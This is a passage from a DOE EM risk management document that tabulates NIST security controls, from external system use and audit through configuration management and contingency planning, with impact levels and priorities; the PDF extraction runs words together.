The organization: a)Prohibits the use ofunclassified mobile devicesin facilities containinginformation systemsprocessing, storing, ortransmitting classifiedinformation unlessspecifically permitted by theappropriate authorizingofficial(s); and b) Enforcesthe following restrictions onindividuals permitted to usemobile devices in facilitiescontaining informationsystems processing, storing,or transmitting classifiedinformation: 1) - Connectionof unclassified mobiledevices to classifiedinformation systems isprohibited; 2) - Connectionof unclassified mobiledevices to unclassifiedinformation systemsrequires approval from theappropriate authorizingofficial(s); 3) - Use of internalor external modems orwireless interfaces withinthe mobile devices isprohibited; and 4) - Mobiledevices and the informationstored on those devices aresubject to randomreviews/inspections by[Assignment: organization-defined security officials],and if classified informationis found, the incidenthandling policy is followed.
AC-20Use Of External
Information SystemsX X X X X X X X X No Yes P1
The organization establishesterms and conditions,consistent with any trustrelationships establishedwith other organizationsowning, operating, and/ormaintaining externalinformation systems,allowing authorizedindividuals to: a) Access theinformation system from theexternal informationsystems; and b) Process,store, and/or transmitorganization-controlledinformation using theexternal informationsystems.
________________________________________________________________________
________________________________________________________________________DOE EM RMAIP Version 5.1
163 of 266
C C C I I I A A A N N N
Cntl # Control Name L M H L M H L M H L M HNSS
StandAlone
NSSNetwork
Priority NIST Control Requirement
AC-20(1)Use Of External
Information SystemsX X X X X X X X No No P1
The organization permitsauthorized individuals to usean external informationsystem to access theinformation system or toprocess, store, or transmitorganization-controlledinformation only when theorganization: a) Can verifythe implementation ofrequired security controls onthe external system asspecified in theorganization’s informationsecurity policy and securityplan; or b) Has approvedinformation systemconnection or processingagreements with theorganizational entity hostingthe external informationsystem.
AC-20(2)Use Of External
Information SystemsX X X X X No No P1
The organization limits theuse of organization-controlled portable storagemedia by authorizedindividuals on externalinformation systems.
AC-22Publicly Accessible
ContentX X X X X X No No P2
The organization: a)Designates individualsauthorized to postinformation onto anorganizational informationsystem that is publiclyaccessible; b) Trainsauthorized individuals toensure that publiclyaccessible information doesnot contain nonpublicinformation; c) Reviews theproposed content of publiclyaccessible information fornonpublic information priorto posting onto theorganizational informationsystem; d) Reviews thecontent on the publiclyaccessible organizationalinformation system fornonpublic information[Assignment: organization-defined frequency]; and e)Removes nonpublicinformation from the publiclyaccessible organizationalinformation system, ifdiscovered.
________________________________________________________________________
________________________________________________________________________DOE EM RMAIP Version 5.1
164 of 266
C C C I I I A A A N N N
Cntl # Control Name L M H L M H L M H L M HNSS
StandAlone
NSSNetwork
Priority NIST Control Requirement
AT-1Security AwarenessAnd Training Policy
And ProceduresX X X X X X X X X X X X Yes Yes P1
The organization develops,disseminates, andreviews/updates[Assignment: organization-defined frequency]: a) Aformal, documented securityawareness and trainingpolicy that addressespurpose, scope, roles,responsibilities,management commitment,coordination amongorganizational entities, andcompliance; and b) Formal,documented procedures tofacilitate the implementationof the security awarenessand training policy andassociated securityawareness and trainingcontrols.
AT-2 Security Awareness X X X X X X X X X X X X Yes Yes P1
The organization providesbasic security awarenesstraining to all informationsystem users (includingmanagers, seniorexecutives, and contractors)as part of initial training fornew users, when required bysystem changes, and[Assignment: organization-defined frequency]thereafter.
AT-3 Security Training X X X X X X X X X X X X Yes Yes P1
The organization providesrole-based security-relatedtraining: (i) beforeauthorizing access to thesystem or performingassigned duties; (ii) whenrequired by system changes;and (iii) [Assignment:organization-definedfrequency] thereafter.
AT-3(2) Security Training X X X X X X X X X Yes Yes PO
The organization providesemployees with initial and[Assignment: organization-defined frequency] trainingin the employment andoperation of physicalsecurity controls.
AT-4Security Training
RecordsX X X X X X X X X X X X Yes Yes P3
The organization: a)Documents and monitorsindividual informationsystem security trainingactivities including basicsecurity awareness trainingand specific informationsystem security training; andb) Retains individual trainingrecords for [Assignment:organization-defined timeperiod].
________________________________________________________________________
________________________________________________________________________DOE EM RMAIP Version 5.1
165 of 266
C C C I I I A A A N N N
Cntl # Control Name L M H L M H L M H L M HNSS
StandAlone
NSSNetwork
Priority NIST Control Requirement
AT-5Contacts With
Security Groups AndAssociations
X X X X X X X X X Yes Yes P0
The organization establishesand institutionalizes contactwith selected groups andassociations within thesecurity community: a) - Tofacilitate ongoing securityeducation and training fororganizational personnel; b)- To stay up to date with thelatest recommendedsecurity practices,techniques, andtechnologies; and c) - Toshare current security-related information includingthreats, vulnerabilities, andincidents.
AU-1Audit And
Accountability PolicyAnd Procedures
X X X X X X X X X X X X Yes Yes P1
The organization develops,disseminates, andreviews/updates[Assignment: organization-defined frequency]: a) Aformal, documented auditand accountability policythat addresses purpose,scope, roles,responsibilities,management commitment,coordination amongorganizational entities, andcompliance; and b) Formal,documented procedures tofacilitate the implementationof the audit andaccountability policy andassociated audit andaccountability controls.
________________________________________________________________________
________________________________________________________________________DOE EM RMAIP Version 5.1
166 of 266
C C C I I I A A A N N N
Cntl # Control Name L M H L M H L M H L M HNSS
StandAlone
NSSNetwork
Priority NIST Control Requirement
AU-2 Auditable Events X X X X X X X X X Yes Yes P1
The organization: a)Determines, based on a riskassessment andmission/business needs,that the information systemmust be capable of auditingthe following events:[Assignment: organization-defined list of auditableevents]; b) Coordinates thesecurity audit function withother organizational entitiesrequiring audit-relatedinformation to enhancemutual support and to helpguide the selection ofauditable events; c) Providesa rationale for why the list ofauditable events aredeemed to be adequate tosupport after-the-factinvestigations of securityincidents; and d)Determines, based oncurrent threat informationand ongoing assessment ofrisk, that the followingevents are to be auditedwithin the informationsystem: [Assignment:organization-defined subsetof the auditable eventsdefined in AU-2 a. to beaudited along with thefrequency of (or situationrequiring) auditing for eachidentified event].
AU-2(3) Auditable Events X X X X X X X X Yes Yes P1
The organization reviewsand updates the list ofauditable events[Assignment: organization-defined frequency].
AU-2(4) Auditable Events X X X X X X X X Yes Yes P1
The organization includesexecution of privilegedfunctions in the list of eventsto be audited by theinformation system.
AU-3Content Of Audit
RecordsX X X X X X X X X Yes Yes P1
The information systemproduces audit records thatcontain sufficientinformation to, at aminimum, establish whattype of event occurred,when (date and time) theevent occurred, where theevent occurred, the sourceof the event, the outcome(success or failure) of theevent, and the identity ofany user/subject associatedwith the event.
________________________________________________________________________
________________________________________________________________________DOE EM RMAIP Version 5.1
167 of 266
C C C I I I A A A N N N
Cntl # Control Name L M H L M H L M H L M HNSS
StandAlone
NSSNetwork
Priority NIST Control Requirement
AU-3(1)Content Of Audit
RecordsX X X X X X X X Yes Yes P1
The information systemincludes [Assignment:organization-definedadditional, more detailedinformation] in the auditrecords for audit eventsidentified by type, location,or subject.
AU-3(2)Content Of Audit
RecordsX X X X X X X Yes Yes PO
The organization centrallymanages the content ofaudit records generated by[Assignment: organization-defined information systemcomponents].
AU-4Audit Storage
CapacityX X X X X X Yes Yes P1
The organization allocatesaudit record storagecapacity and configuresauditing to reduce thelikelihood of such capacitybeing exceeded.
AU-5Response To AuditProcessing Failures
X X X X X X No Yes P1
The information system: a)Alerts designatedorganizational officials in theevent of an audit processingfailure; and b) Takes thefollowing additional actions:[Assignment: organization-defined actions to be taken(e.g., shut down informationsystem, overwrite oldestaudit records, stopgenerating audit records)].
AU-5(1)Response To AuditProcessing Failures
X X X X No Yes P1
The information systemprovides a warning whenallocated audit recordstorage volume reaches[Assignment: organization-defined percentage] ofmaximum audit recordstorage capacity.
AU-5(2)Response To AuditProcessing Failures
X X X No Yes P1
The information systemprovides a real-time alertwhen the following auditfailure events occur:[Assignment: organization-defined audit failure eventsrequiring real-time alerts].
________________________________________________________________________
________________________________________________________________________DOE EM RMAIP Version 5.1
168 of 266
C C C I I I A A A N N N
Cntl # Control Name L M H L M H L M H L M HNSS
StandAlone
NSSNetwork
Priority NIST Control Requirement
AU-6Audit Review,Analysis, And
ReportingX X X X X X X X X Yes Yes P1
The organization: a) Reviewsand analyzes informationsystem audit records[Assignment: organization-defined frequency] forindications of inappropriateor unusual activity, andreport's findings todesignated organizationalofficials; and b) Adjusts thelevel of audit review,analysis, and reportingwithin the informationsystem when there is achange in risk toorganizational operations,organizational assets,individuals, otherorganizations, or the Nationbased on law enforcementinformation, intelligenceinformation, or othercredible sources ofinformation.
AU-6(1)Audit Review,Analysis, And
ReportingX X X X X No No P1
The information systemintegrates audit review,analysis, and reportingprocesses to supportorganizational processes forinvestigation and responseto suspicious activities.
AU 6(2)Audit Review,Analysis, And
Reporting- - - - - - - - -
[Withdrawn: Incorporatedinto SI-4].
AU-6(3)Audit Review,Analysis, And
ReportingX X X X X X No Yes P1
The organization analyzesand correlates audit recordsacross different repositoriesto gain organization-widesituational awareness.
AU-7Audit Reduction AndReport Generation
X X X X X X No No P2
The information systemprovides an audit reductionand report generationcapability
AU-7(1)Audit Reduction AndReport Generation
X X X X X X No No P2
The information systemprovides the capability toautomatically process auditrecords for events of interestbased on selectable eventcriteria.
AU-8 Time Stamps X X X X X X Yes Yes P1
The information system usesinternal system clocks togenerate time stamps foraudit records.
AU-8(1) Time Stamps X X X X X No No P1
The information systemsynchronizes internalinformation system clocks[Assignment: organization-defined frequency] with[Assignment: organization-defined authoritative timesource].
________________________________________________________________________
________________________________________________________________________DOE EM RMAIP Version 5.1
169 of 266
C C C I I I A A A N N N
Cntl # Control Name L M H L M H L M H L M HNSS
StandAlone
NSSNetwork
Priority NIST Control Requirement
AU-9Protection Of Audit
InformationX X X X X X X X X No Yes P1
The information systemprotects audit informationand audit tools fromunauthorized access,modification, and deletion.
AU-9(1)Protection Of Audit
Information
The information systemproduces audit records onhardware-enforced, write-once media.
AU-9(2)Protection Of Audit
InformationX X No Yes PO
The information systembacks up audit records[Assignment: organization-defined frequency] onto adifferent system or mediathan the system beingaudited.
AU-9(3)Protection Of Audit
InformationX No Yes P1
The information system usescryptographic mechanismsto protect the integrity ofaudit information and audittools.
AU-9(4)Protection Of Audit
InformationX X X No Yes PO
The organization: a)Authorizes access tomanagement of auditfunctionality to only a limitedsubset of privileged users;and b) Protects the auditrecords of non-localaccesses to privilegedaccounts and the executionof privileged functions.
AU-10 Non-Repudiation X X X No Yes P1
The information systemprotects against anindividual falsely denyinghaving performed aparticular action.
AU-10(5) Non-Repudiation X X No No P1
The organization employs[Selection: FIPS-validated;NSA-approved] cryptographyto implement digitalsignatures.
AU-11Audit Record
RetentionX X X X X X Yes Yes P3
The organization retainsaudit records for[Assignment: organization-defined time periodconsistent with recordsretention policy] to providesupport for after-the-factinvestigations of securityincidents and to meetregulatory andorganizational informationretention requirements.
________________________________________________________________________
________________________________________________________________________DOE EM RMAIP Version 5.1
170 of 266
C C C I I I A A A N N N
Cntl # Control Name L M H L M H L M H L M HNSS
StandAlone
NSSNetwork
Priority NIST Control Requirement
AU-12 Audit Generation X X X X X X X X X X X X Yes Yes P1
The information system: a)Provides audit recordgeneration capability for thelist of auditable eventsdefined in AU-2 at[Assignment: organization-defined information systemcomponents]; b) Allowsdesignated organizationalpersonnel to select whichauditable events are to beaudited by specificcomponents of the system;and c) Generates auditrecords for the list ofaudited events defined inAU-2 with the content asdefined in AU-3.
AU-12(1) Audit Generation X X Yes Yes P1
The information systemcompiles audit records from[Assignment: organization-defined information systemcomponents] into a system-wide (logical or physical)audit trail that is time-correlated to within[Assignment: organization-defined level of tolerance forrelationship between timestamps of individual recordsin the audit trail].
AU-13Monitoring For
InformationDisclosure
The organization monitorsopen source information forevidence of unauthorizedexfiltration or disclosure oforganizational information[Assignment: organization-defined frequency].
CA-1
Security AssessmentAnd Authorization
Policies AndProcedures
X X X X X X X X X X X X Yes Yes P1
The organization develops,disseminates, andreviews/updates[Assignment: organization-defined frequency]: a)Formal, documentedsecurity assessment andauthorization policies thataddress purpose, scope,roles, responsibilities,management commitment,coordination amongorganizational entities, andcompliance; and b) Formal,documented procedures tofacilitate the implementationof the security assessmentand authorization policiesand associated securityassessment andauthorization controls.
________________________________________________________________________
________________________________________________________________________DOE EM RMAIP Version 5.1
171 of 266
C C C I I I A A A N N N
Cntl # Control Name L M H L M H L M H L M HNSS
StandAlone
NSSNetwork
Priority NIST Control Requirement
CA-2Security
AssessmentsX X X X X X X X X X X X Yes Yes P2
The organization: a)Develops a securityassessment plan thatdescribes the scope of theassessment including: 1)Security controls and controlenhancements underassessment; 2) Assessmentprocedures to be used todetermine security controleffectiveness; and 3)Assessment environment,assessment team, andassessment roles andresponsibilities; b) Assessesthe security controls in theinformation system[Assignment: organization-defined frequency] todetermine the extent towhich the controls areimplemented correctly,operating as intended, andproducing the desiredoutcome with respect tomeeting the securityrequirements for the system;c) Produces a securityassessment report thatdocuments the results of theassessment; and d) Providesthe results of the securitycontrol assessment, inwriting, to the authorizingofficial or authorizing officialdesignated representative.
CA-2(1)Security
AssessmentsX X X X X X X X X X X Yes Yes P2
The organization employs anindependent assessor orassessment team toconduct an assessment ofthe security controls in theinformation system.
CA-2(2)Security
AssessmentsX X X X Yes Yes P2
The organization includes aspart of security controlassessments, [Assignment:organization-definedfrequency], [Selection:announced; unannounced],[Selection: in-depthmonitoring; malicious usertesting; penetration testing;red team exercises;[Assignment: organization-defined other forms ofsecurity testing]].
________________________________________________________________________
________________________________________________________________________DOE EM RMAIP Version 5.1
172 of 266
C C C I I I A A A N N N
Cntl # Control Name L M H L M H L M H L M HNSS
StandAlone
NSSNetwork
Priority NIST Control Requirement
CA-3Information System
ConnectionsX X X X X X X X X No Yes P1
The organization: a)Authorizes connections fromthe information system toother information systemsoutside of the authorizationboundary through the use ofInterconnection SecurityAgreements; b) Documents,for each connection, theinterface characteristics,security requirements, andthe nature of theinformation communicated;and c) Monitors theinformation systemconnections on an ongoingbasis verifying enforcementof security requirements.
CA-3(1)Information System
ConnectionsX X X No Yes P1
The organization prohibitsthe direct connection of anunclassified, nationalsecurity system to anexternal network.
CA-3(2)Information System
ConnectionsX X No Yes P1
The organization prohibitsthe direct connection of aclassified, national securitysystem to an externalnetwork.
CA-5Plan Of Action And
MilestonesX X X X X X X X X X X X Yes Yes P3
The organization: a)Develops a plan of actionand milestones for theinformation system todocument the organization’splanned remedial actions tocorrect weaknesses ordeficiencies noted duringthe assessment of thesecurity controls and toreduce or eliminate knownvulnerabilities in the system;and b) Updates existing planof action and milestones[Assignment: organization-defined frequency] based onthe findings from securitycontrols assessments,security impact analyses,and continuous monitoringactivities.
CA-6Security
AuthorizationX X X X X X X X X X X X Yes Yes P3
The organization: a) Assignsa senior-level executive ormanager to the role ofauthorizing official for theinformation system; b)Ensures that the authorizingofficial authorizes theinformation system forprocessing beforecommencing operations;and c) Updates the securityauthorization [Assignment:organization-definedfrequency].
________________________________________________________________________
________________________________________________________________________DOE EM RMAIP Version 5.1
173 of 266
C C C I I I A A A N N N
Cntl # Control Name L M H L M H L M H L M HNSS
StandAlone
NSSNetwork
Priority NIST Control Requirement
CA-7ContinuousMonitoring
X X X X X X X X X X X X Yes Yes P3
The organization establishesa continuous monitoringstrategy and implements acontinuous monitoringprogram that includes: a) Aconfiguration managementprocess for the informationsystem and its constituentcomponents; b) Adetermination of the securityimpact of changes to theinformation system andenvironment of operation; c)Ongoing security controlassessments in accordancewith the organizationalcontinuous monitoringstrategy; and d) Reportingthe security state of theinformation system toappropriate organizationalofficials [Assignment:organization-definedfrequency].
CA-7(1)ContinuousMonitoring
X X X X X X X X X Yes Yes P3
The organization employs anindependent assessor orassessment team to monitorthe security controls in theinformation system on anongoing basis.
CA-7(2)ContinuousMonitoring
X X X X X X X X X Yes Yes P3
The organization plans,schedules, and conductsassessments [Assignment:organization-definedfrequency], [Selection:announced; unannounced],[Selection: in-depthmonitoring; malicious usertesting; penetration testing;red team exercises;[Assignment: organization-defined other forms ofsecurity assessment]] toensure compliance with allvulnerability mitigationprocedures.
________________________________________________________________________
________________________________________________________________________DOE EM RMAIP Version 5.1
174 of 266
C C C I I I A A A N N N
Cntl # Control Name L M H L M H L M H L M HNSS
StandAlone
NSSNetwork
Priority NIST Control Requirement
CM-1Configuration
Management PolicyAnd Procedures
X X X X X X X X X Yes Yes P1
The organization develops,disseminates, andreviews/updates[Assignment: organization-defined frequency]: a) Aformal, documentedconfiguration managementpolicy that addressespurpose, scope, roles,responsibilities,management commitment,coordination amongorganizational entities, andcompliance; and b) Formal,documented procedures tofacilitate the implementationof the configurationmanagement policy andassociated configurationmanagement controls.
CM-2Baseline
ConfigurationX X X X X X Yes Yes P1
The organization develops,documents, and maintainsunder configuration control,a current baselineconfiguration of theinformation system.
CM-2(1)Baseline
ConfigurationX X X X X Yes Yes P1
The organization reviewsand updates the baselineconfiguration of theinformation system: a)[Assignment: organization-defined frequency]; b) Whenrequired due to [Assignmentorganization-definedcircumstances]; and c) Asan integral part ofinformation systemcomponent installations andupgrades.
CM-2(2)Baseline
ConfigurationX X Yes no P1
The organization employsautomated mechanisms tomaintain an up-to-date,complete, accurate, andreadily available baselineconfiguration of theinformation system.
CM-2(3)Baseline
ConfigurationX X X X Yes Yes P1
The organization retainsolder versions of baselineconfigurations as deemednecessary to supportrollback.
CM-2(4)Baseline
ConfigurationX X
The organization: a)Develops and maintains[Assignment: organization-defined list of softwareprograms not authorized toexecute on the informationsystem]; and b) Employs anallow-all, deny-by-exceptionauthorization policy toidentify software allowed toexecute on the informationsystem.
________________________________________________________________________
________________________________________________________________________DOE EM RMAIP Version 5.1
175 of 266
C C C I I I A A A N N N
Cntl # Control Name L M H L M H L M H L M HNSS
StandAlone
NSSNetwork
Priority NIST Control Requirement
CM-2(5)Baseline
ConfigurationX X X X Yes Yes P1
The organization: a)Develops and maintains[Assignment: organization-defined list of softwareprograms authorized toexecute on the informationsystem]; and b) Employs adeny-all, permit-by-exceptionauthorization policy toidentify software allowed toexecute on the informationsystem.
CM-2(6)Baseline
ConfigurationX Yes Yes P1
The organization maintainsa baseline configuration fordevelopment and testenvironments that ismanaged separately fromthe operational baselineconfiguration.
CM-3Configuration
Change ControlX X X X X Yes Yes P1
The organization: a)Determines the types ofchanges to the informationsystem that areconfiguration controlled; b)Approves configuration-controlled changes to thesystem with explicitconsideration for securityimpact analyses; c)Documents approvedconfiguration-controlledchanges to the system; d)Retains and reviews recordsof configuration-controlledchanges to the system; e)Audits activities associatedwith configuration-controlledchanges to the system; andf) Coordinates and providesoversight for configurationchange control activitiesthrough [Assignment:organization-definedconfiguration change controlelement (e.g., committee,board] that convenes[Selection: (one or more):[Assignment: organization-defined frequency];[Assignment: organization-defined configurationchange conditions]].
________________________________________________________________________
________________________________________________________________________DOE EM RMAIP Version 5.1
176 of 266
C C C I I I A A A N N N
Cntl # Control Name L M H L M H L M H L M HNSS
StandAlone
NSSNetwork
Priority NIST Control Requirement
CM-3(1)Configuration
Change ControlX X No No P1
The organization employsautomated mechanisms to:a) Document proposedchanges to the informationsystem; b) Notify designatedapproval authorities; c)Highlight approvals thathave not been received by[Assignment: organization-defined time period]; d)Inhibit change untildesignated approvals arereceived; and e) Documentcompleted changes to theinformation system.
CM-3(2)Configuration
Change ControlX X X X Yes Yes P1
The organization tests,validates, and documentschanges to the informationsystem before implementingthe changes on theoperational system.
CM-3(3)Configuration
Change Control
The organization employsautomated mechanisms toimplement changes to thecurrent information systembaseline and deploys theupdated baseline across theinstalled base.
CM-3(4)Configuration
Change ControlX X X Yes Yes P1
The organization requires aninformation securityrepresentative to be amember of the [Assignment:organization-definedconfiguration change controlelement (e.g., committee,board)].
CM-4Security Impact
AnalysisX X X X X X Yes Yes P2
The organization analyzeschanges to the informationsystem to determinepotential security impactsprior to changeimplementation.
CM-4(1)Security Impact
AnalysisX X X Yes Yes P2
The organization analyzesnew software in a separatetest environment beforeinstallation in an operationalenvironment, looking forsecurity impacts due toflaws, weaknesses,incompatibility, orintentional malice.
CM-4(2)Security Impact
AnalysisX X X Yes Yes P2
The organization, after theinformation system ischanged, checks thesecurity functions to verifythat the functions areimplemented correctly,operating as intended, andproducing the desiredoutcome with regard tomeeting the securityrequirements for the system.
________________________________________________________________________
________________________________________________________________________DOE EM RMAIP Version 5.1
177 of 266
C C C I I I A A A N N N
Cntl # Control Name L M H L M H L M H L M HNSS
StandAlone
NSSNetwork
Priority NIST Control Requirement
CM-5Access Restrictions
For ChangeX X X X X Yes Yes P1
The organization defines,documents, approves, andenforces physical and logicalaccess restrictionsassociated with changes tothe information system.
CM-5(1)Access Restrictions
For ChangeX Yes Yes P1
The organization employsautomated mechanisms toenforce access restrictionsand support auditing of theenforcement actions.
CM-5(2)Access Restrictions
For ChangeX X X X Yes Yes P1
The organization conductsaudits of information systemchanges [Assignment:organization-definedfrequency] and whenindications so warrant todetermine whetherunauthorized changes haveoccurred.
CM-5(3)Access Restrictions
For ChangeX X No No P1
The information systemprevents the installation of[Assignment: organization-defined critical softwareprograms] that are notsigned with a certificate thatis recognized and approvedby the organization.
CM-5(5)Access Restrictions
For ChangeX X X No Yes P1
The organization: a) Limitsinformation systemdeveloper/integratorprivileges to changehardware, software, andfirmware components andsystem information directlywithin a productionenvironment; and b)Reviews and reevaluatesinformation systemdeveloper/integratorprivileges [Assignment:organization-definedfrequency].
CM-5(6)Access Restrictions
For ChangeX X X Yes Yes P1
The organization limitsprivileges to changesoftware resident withinsoftware libraries (includingprivileged programs).
________________________________________________________________________
________________________________________________________________________DOE EM RMAIP Version 5.1
178 of 266
C C C I I I A A A N N N
Cntl # Control Name L M H L M H L M H L M HNSS
StandAlone
NSSNetwork
Priority NIST Control Requirement
CM-6Configuration
SettingsX X X X X X Yes Yes P1
The organization: a)Establishes and documentsmandatory configurationsettings for informationtechnology productsemployed within theinformation system using[Assignment: organization-defined securityconfiguration checklists]that reflect the mostrestrictive mode consistentwith operationalrequirements; b)Implements theconfiguration settings; c)Identifies, documents, andapproves exceptions fromthe mandatory configurationsettings for individualcomponents within theinformation system basedon explicit operationalrequirements; and d)Monitors and controlschanges to the configurationsettings in accordance withorganizational policies andprocedures.
CM-6(1)Configuration
SettingsX X X No Yes P1
The organization employsautomated mechanisms tocentrally manage, apply, andverify configuration settings.
CM-6(2)Configuration
SettingsX X No Yes P1
The organization employsautomated mechanisms torespond to unauthorizedchanges to [Assignment:organization-definedconfiguration settings].
CM-6(3)Configuration
SettingsX X X X X Yes Yes P1
The organizationincorporates detection ofunauthorized, security-relevant configurationchanges into theorganization’s incidentresponse capability toensure that such detectedevents are tracked,monitored, corrected, andavailable for historicalpurposes.
CM-7 Least Functionality X X X X X X X X X Yes Yes P1
The organization configuresthe information system toprovide only essentialcapabilities and specificallyprohibits or restricts the useof the following functions,ports, protocols, and/orservices: [Assignment:organization-defined list ofprohibited or restrictedfunctions, ports, protocols,and/or services].
________________________________________________________________________
________________________________________________________________________DOE EM RMAIP Version 5.1
179 of 266
C C C I I I A A A N N N
Cntl # Control Name L M H L M H L M H L M HNSS
StandAlone
NSSNetwork
Priority NIST Control Requirement
CM-7(1) Least Functionality X X X X X X X X Yes Yes P1
The organization reviews theinformation system[Assignment: organization-defined frequency] toidentify and eliminateunnecessary functions,ports, protocols, and/orservices.
CM-7(2) Least Functionality X X X X X Yes Yes P1
The organization employsautomated mechanisms toprevent program executionin accordance with[Selection (one or more): listof authorized softwareprograms; list ofunauthorized softwareprograms; rules authorizingthe terms and conditions ofsoftware program usage].
CM-7(3) Least Functionality X X X X X X Yes Yes P1
The organization ensurescompliance with[Assignment: organization-defined registrationrequirements for ports,protocols, and services].
CM-8Information System
ComponentInventory
X X X X X X Yes Yes P1
The organization develops,documents, and maintainsan inventory of informationsystem components that: a)Accurately reflects thecurrent information system;b) Is consistent with theauthorization boundary ofthe information system; c) Isat the level of granularitydeemed necessary fortracking and reporting; d)Includes [Assignment:organization-definedinformation deemednecessary to achieveeffective propertyaccountability]; and e) Isavailable for review andaudit by designatedorganizational officials.
CM-8(1)Information System
ComponentInventory
X X X X X Yes Yes P1
The organization updatesthe inventory of informationsystem components as anintegral part of componentinstallations, removals, andinformation system updates.
CM-8(2)Information System
ComponentInventory
X X Yes Yes P1
The organization employsautomated mechanisms tohelp maintain an up-to-date,complete, accurate, andreadily available inventory ofinformation systemcomponents.
________________________________________________________________________
________________________________________________________________________DOE EM RMAIP Version 5.1
180 of 266
C C C I I I A A A N N N
Cntl # Control Name L M H L M H L M H L M HNSS
StandAlone
NSSNetwork
Priority NIST Control Requirement
CM-8(3)Information System
ComponentInventory
X X Yes Yes P1
The organization: a) Employsautomated mechanisms[Assignment: organization-defined frequency] to detectthe addition of unauthorizedcomponents/devices intothe information system; andb) Disables network accessby suchcomponents/devices ornotifies designatedorganizational officials.
CM-8(4)Information System
ComponentInventory
X X X X Yes Yes P1
The organization includes inproperty accountabilityinformation for informationsystem components, ameans for identifying by[Selection (one or more):name; position; role]individuals responsible foradministering thosecomponents.
CM-8(5)Information System
ComponentInventory
X X X X X Yes Yes P1
The organization verifiesthat all components withinthe authorization boundaryof the information systemare either inventoried as apart of the system orrecognized by anothersystem as a componentwithin that system.
CM-9Configuration
Management PlanX X X X X Yes Yes P1
The organization develops,documents, and implementsa configurationmanagement plan for theinformation system that: a)Addresses roles,responsibilities, andconfiguration managementprocesses and procedures;b) Defines the configurationitems for the informationsystem and when in thesystem development lifecycle the configuration itemsare placed underconfiguration management;and c) Establishes themeans for identifyingconfiguration itemsthroughout the systemdevelopment life cycle and aprocess for managing theconfiguration of theconfiguration items.
________________________________________________________________________
________________________________________________________________________DOE EM RMAIP Version 5.1
181 of 266
C C C I I I A A A N N N
Cntl # Control Name L M H L M H L M H L M HNSS
StandAlone
NSSNetwork
Priority NIST Control Requirement
CP-1Contingency
Planning Policy AndProcedures
X X X X X X X X X X X X Yes Yes P1
The organization develops,disseminates, andreviews/updates[Assignment: organization-defined frequency]: a) Aformal, documentedcontingency planning policythat addresses purpose,scope, roles,responsibilities,management commitment,coordination amongorganizational entities, andcompliance; and b) Formal,documented procedures tofacilitate the implementationof the contingency planningpolicy and associatedcontingency planningcontrols.
________________________________________________________________________
________________________________________________________________________DOE EM RMAIP Version 5.1
182 of 266
C C C I I I A A A N N N
Cntl # Control Name L M H L M H L M H L M HNSS
StandAlone
NSSNetwork
Priority NIST Control Requirement
CP-2 Contingency Plan X X X X X X Yes Yes P1
The organization: a)Develops a contingency planfor the information systemthat: 1) - Identifies essentialmissions and businessfunctions and associatedcontingency requirements;2) - Provides recoveryobjectives, restorationpriorities, and metrics; 3) -Addresses contingencyroles, responsibilities,assigned individuals withcontact information; 4) -Addresses maintainingessential missions andbusiness functions despitean information systemdisruption, compromise, orfailure; 5) - Addresseseventual, full informationsystem restoration withoutdeterioration of the securitymeasures originally plannedand implemented; and 6) - Isreviewed and approved bydesignated officials withinthe organization; b)Distributes copies of thecontingency plan to[Assignment: organization-defined list of keycontingency personnel(identified by name and/orby role) and organizationalelements]; c) Coordinatescontingency planningactivities with incidenthandling activities; d)Reviews the contingencyplan for the informationsystem [Assignment:organization-definedfrequency]; e) Revises thecontingency plan to addresschanges to the organization,information system, orenvironment of operationand problems encounteredduring contingency planimplementation, execution,or testing; and f)Communicates contingencyplan changes to[Assignment: organization-defined list of keycontingency personnel(identified by name and/orby role) and organizationalelements].
________________________________________________________________________
________________________________________________________________________DOE EM RMAIP Version 5.1
183 of 266
C C C I I I A A A N N N
Cntl # Control Name L M H L M H L M H L M HNSS
StandAlone
NSSNetwork
Priority NIST Control Requirement
CP-2(1) Contingency Plan X X X X No Yes P1
The organizationcoordinates contingencyplan development withorganizational elementsresponsible for relatedplans.
CP-2(2) Contingency Plan X X X No Yes P1
The organization conductscapacity planning so thatnecessary capacity forinformation processing,telecommunications, andenvironmental supportexists during contingencyoperations.
CP-2(3) Contingency Plan X X X No Yes P1
The organization plans forthe resumption of essentialmissions and businessfunctions within[Assignment: organization-defined time period] ofcontingency plan activation.
CP-2(4) Contingency Plan X X No Yes P1
The organization plans forthe full resumption ofmissions and businessfunctions within[Assignment: organization-defined time period] ofcontingency plan activation.
CP-2(5) Contingency Plan X No Yes P1
The organization plans forthe continuance of essentialmissions and businessfunctions with little or noloss of operational continuityand sustains that continuityuntil full information systemrestoration at primaryprocessing and/or storagesites.
CP-2(6) Contingency Plan X No Yes P1
The organization providesfor the transfer of allessential missions andbusiness functions toalternate processing and/orstorage sites with little or noloss of operational continuityand sustains that continuitythrough restoration toprimary processing and/orstorage sites.
CP-3Contingency
TrainingX X X X X X Yes Yes P2
The organization trainspersonnel in theircontingency roles andresponsibilities with respectto the information systemand provides refreshertraining [Assignment:organization-definedfrequency].
CP-3(1)Contingency
TrainingX X No No P2
The organizationincorporates simulatedevents into contingencytraining to facilitate effectiveresponse by personnel incrisis situations.
________________________________________________________________________
________________________________________________________________________DOE EM RMAIP Version 5.1
184 of 266
C C C I I I A A A N N N
Cntl # Control Name L M H L M H L M H L M HNSS
StandAlone
NSSNetwork
Priority NIST Control Requirement
CP-4Contingency Plan
Testing AndExercises
X X X X X X Yes Yes P2
The organization: a) Testsand/or exercises thecontingency plan for theinformation system[Assignment: organization-defined frequency] using[Assignment: organization-defined tests and/orexercises] to determine theplan’s effectiveness and theorganization’s readiness toexecute the plan; and b)Reviews the contingencyplan test/exercise resultsand initiates correctiveactions.
CP-4(1)Contingency Plan
Testing AndExercises
X X X X Yes Yes P2
The organizationcoordinates contingencyplan testing and/orexercises with organizationalelements responsible forrelated plans.
CP-4(2)Contingency Plan
Testing AndExercises
X X No No P2
The organizationtests/exercises thecontingency plan at thealternate processing site tofamiliarize contingencypersonnel with the facilityand available resources andto evaluate the site’scapabilities to supportcontingency operations.
CP-4(4)Contingency Plan
Testing AndExercises
X Yes Yes P2
The organization includes afull recovery andreconstitution of theinformation system to aknown state as part ofcontingency plan testing.
CP-6Alternate Storage
SiteX X X X No No P1
The organization establishesan alternate storage siteincluding necessaryagreements to permit thestorage and recovery ofinformation system backupinformation.
CP-6(1)Alternate Storage
SiteX X X X No No P1
The organization identifiesan alternate storage sitethat is separated from theprimary storage site so asnot to be susceptible to thesame hazards.
CP-6(2)Alternate Storage
SiteX X No No P1
